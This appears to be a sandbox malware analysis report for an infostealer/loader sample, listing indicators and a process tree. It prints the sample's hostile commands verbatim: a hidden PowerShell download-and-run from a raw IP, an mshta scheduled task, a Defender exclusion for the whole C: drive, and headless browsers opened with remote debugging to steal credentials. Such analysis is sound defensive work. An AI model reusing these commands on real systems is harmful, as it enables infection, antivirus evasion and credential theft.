MSBuild.exe Token: SeShutdownPrivilege 1916 MSBuild.exe Token: SeDebugPrivilege 1916 MSBuild.exe Token: SeSystemEnvironmentPrivilege 1916 MSBuild.exe Token: SeRemoteShutdownPrivilege 1916 MSBuild.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 3192 rundll32.exe 2016 rundll32.exe 1876 MSBuild.exe 4728 chrome.exe 5648 rundll32.exe 552 msedge.exe 1148 rundll32.exe 6012 rundll32.exe 2488 rundll32.exe 3816 rundll32.exe 14056 rundll32.exe 6476 rundll32.exe 6640 rundll32.exe 9732 rundll32.exe 7456 rundll32.exe 868 rundll32.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1876 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2988 wrote to memory of 1916 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 2988 wrote to memory of 1916 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 2988 wrote to memory of 1916 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 85 PID 2988 wrote to memory of 5776 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2988 wrote to memory of 5776 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 2988 wrote to memory of 5776 2988 2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 1916 wrote to memory of 2560 1916 cmd.exe 88 PID 1916 wrote to memory of 2560 1916 cmd.exe 88 PID 1916 wrote to memory of 2560 1916 cmd.exe 88 PID 5776 wrote to memory of 4188 5776 mshta.exe 89 PID 5776 wrote to memory of 4188 5776 mshta.exe 89 PID 5776 wrote to memory of 4188 5776 mshta.exe 89 PID 4188 wrote to memory of 5304 4188 powershell.exe 99 PID 4188 wrote to memory of 5304 4188 powershell.exe 99 PID 4188 wrote to memory of 5304 4188 powershell.exe 99 PID 5304 wrote to memory of 6104 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 100 PID 5304 wrote to memory of 6104 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 100 PID 5304 wrote to memory of 6104 5304 TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE 100 PID 6104 wrote to memory of 3920 6104 rapes.exe 104 PID 6104 wrote to memory of 3920 6104 rapes.exe 104 PID 3920 wrote to memory of 4444 3920 31W3sid.exe 105 PID 3920 wrote to memory of 4444 3920 31W3sid.exe 105 PID 3920 wrote to memory of 4444 3920 31W3sid.exe 105 PID 3920 wrote to memory of 2956 3920 31W3sid.exe 106 PID 3920 wrote to memory of 2956 3920 31W3sid.exe 106 PID 3920 wrote to memory of 2956 3920 31W3sid.exe 106 PID 3920 wrote to memory of 5268 3920 31W3sid.exe 107 PID 3920 wrote to memory of 5268 3920 31W3sid.exe 107 PID 3920 wrote to memory of 5268 3920 31W3sid.exe 107 PID 3920 wrote to memory of 5268 3920 31W3sid.exe 107 PID 3920 wrote to memory of 5268 3920 31W3sid.exe 107 PID 3920 wrote to memory of 5268 3920 31W3sid.exe 107 PID 6104 wrote to memory of 6072 6104 rapes.exe 116 PID 6104 wrote to memory of 6072 6104 rapes.exe 116 PID 6072 wrote to memory of 5568 6072 DgQBvwg.exe 117 PID 6072 wrote to memory of 5568 6072 DgQBvwg.exe 117 PID 5568 wrote to memory of 6036 5568 csc.exe 119 PID 5568 wrote to memory of 6036 5568 csc.exe 119 PID 6072 wrote to memory of 828 6072 DgQBvwg.exe 120 PID 6072 wrote to memory of 828 6072 DgQBvwg.exe 120 PID 6072 wrote to memory of 828 6072 DgQBvwg.exe 120 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 6072 wrote to memory of 1876 6072 DgQBvwg.exe 121 PID 5736 wrote to memory of 3668 5736 cmd.exe 124 PID 5736 wrote to memory of 3668 5736 cmd.exe 124 PID 4672 wrote to memory of 744 4672 explorer.exe 126 PID 4672 wrote to memory of 744 4672 explorer.exe 126 PID 744 wrote to memory of 1324 744 exp.exe 128 PID 744 wrote to memory of 1324 744 exp.exe 128 PID 1324 wrote to memory of 4868 1324 csc.exe 130 PID 1324 wrote to memory of 4868 1324 csc.exe 130 PID 744 wrote to memory of 1328 744 exp.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-07_669f3bec52a1cde1a51fee8bfab3b8b5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TG3gRma5YJy /tr "mshta C:\Users\Admin\AppData\Local\Temp\WU8sHcJAu.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TG3gRma5YJy /tr "mshta C:\Users\Admin\AppData\Local\Temp\WU8sHcJAu.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2560
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\WU8sHcJAu.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Users\Admin\AppData\Local\TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE"C:\Users\Admin\AppData\Local\TempQSOPYYHQPWAOVVBAEJIONKX0KQKMIZSN.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5304 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6104 -
C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4444
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2956
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Checks SCSI registry key(s)
PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6072 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bjal1043\bjal1043.cmdline"7⤵
- Suspicious use of WriteProcessMemory
PID:5568 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1CE9.tmp" "c:\Users\Admin\AppData\Local\Temp\bjal1043\CSC5764624E65FB4729BD1C613E2AD63EF.TMP"8⤵PID:6036
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:828
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Downloads MZ/PE file
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1876 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3192
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe--restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4728 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9adb2dcf8,0x7ff9adb2dd04,0x7ff9adb2dd109⤵PID:4712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2168,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2164 /prefetch:39⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2124,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2116 /prefetch:29⤵PID:5280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2372,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2376 /prefetch:89⤵PID:4856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3248,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3244 /prefetch:19⤵
- Uses browser remote debugging
PID:5984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3272,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:19⤵
- Uses browser remote debugging
PID:1796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4256 /prefetch:29⤵
- Uses browser remote debugging
PID:412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4664,i,9335411938947663086,8109096376332112398,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4532 /prefetch:19⤵
- Uses browser remote debugging
PID:1120
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:5648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:552 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2a8,0x7ff9b036f208,0x7ff9b036f214,0x7ff9b036f2209⤵PID:2080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:29⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2416,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2412 /prefetch:39⤵PID:1952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2380,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2624 /prefetch:89⤵PID:1564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3604,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:19⤵
- Uses browser remote debugging
PID:1396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3664,i,5083179104300912456,12538199034923471502,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:19⤵
- Uses browser remote debugging
PID:2820
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:1148
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6012
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:2488
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3816
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:14056
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6476
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:6640
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:9732
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:7456
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Suspicious use of FindShellTrayWindow
PID:868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10494560101\larBxd7.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4536
-
-
C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"C:\Users\Admin\AppData\Local\Temp\10494570101\9sWdA2p.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3496
-
-
C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10494580101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5004
-
-
C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"C:\Users\Admin\AppData\Local\Temp\10494590101\v1BRaoR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1916 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 11608⤵
- Program crash
PID:5584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"C:\Users\Admin\AppData\Local\Temp\10494610101\ibC8xs1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2988 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\knwfzdsw\knwfzdsw.cmdline"7⤵PID:5736
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD107.tmp" "c:\Users\Admin\AppData\Local\Temp\knwfzdsw\CSCB425D5EECDAA4CBCA6CD873CFE85A9E.TMP"8⤵PID:3416
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:5204
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:1892
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10494620101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5660 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
PID:3872
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:936 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:632
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:624 -
C:\Users\Admin\AppData\Local\Temp\{102fe463-1147-4857-a09c-43a0a2fc18ee}\69504511.exe"C:\Users\Admin\AppData\Local\Temp\{102fe463-1147-4857-a09c-43a0a2fc18ee}\69504511.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:6796 -
